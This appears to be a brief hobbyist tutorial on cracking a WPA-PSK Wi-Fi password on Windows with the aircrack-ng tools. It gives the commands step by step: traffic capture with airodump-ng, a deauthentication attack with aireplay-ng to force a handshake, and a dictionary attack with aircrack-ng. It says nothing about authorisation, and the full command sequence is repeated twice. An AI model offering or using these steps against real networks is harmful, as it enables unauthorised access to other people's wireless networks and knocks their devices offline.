This shows how to crack a WPA-PSK network. You need to have installed the commview drivers which i explain in cracking a WEP network part 1.
Here are the commands i type into the three command prompts
REMEMBER AT THE BEGINNING OF EVERY COMMAND PROMPT TYPE IN:
cd c:\aircrack
OR ELSE NOTHING WILL WORK!
Prompt 1:
airserv-ng -d "commview.dll|debug"
once we find out what channel, we type
airserv-ng -d "commview.dll|debug" -c 6
where 6 is the channel
Prompt 2:
airodump-ng 127.0.0.1:666
once we figure out channel we type
airodump-ng --channel 6 -w c:\aircrack\file 127.0.0.1:666
where 6 is channel number
Prompt 3:
aireplay-ng -0 5 -a bssid of network 127.0.0.1:666
prompt 4:
aircrack-ng -a 2 -w 1.lst Isaac-01.cap
where Isaac-01.cap is the name of the captured airodump file
Here are the commands i type into the three command prompts
REMEMBER AT THE BEGINNING OF EVERY COMMAND PROMPT TYPE IN:
cd c:\aircrack
OR ELSE NOTHING WILL WORK!
Prompt 1:
airserv-ng -d "commview.dll|debug"
once we find out what channel, we type
airserv-ng -d "commview.dll|debug" -c 6
where 6 is the channel
Prompt 2:
airodump-ng 127.0.0.1:666
once we figure out channel we type
airodump-ng --channel 6 -w c:\aircrack\file 127.0.0.1:666
where 6 is channel number
Prompt 3:
aireplay-ng -0 5 -a bssid of network 127.0.0.1:666
prompt 4:
aircrack-ng -a 2 -w 1.lst Isaac-01.cap
where Isaac-01.cap is the name of the captured airodump file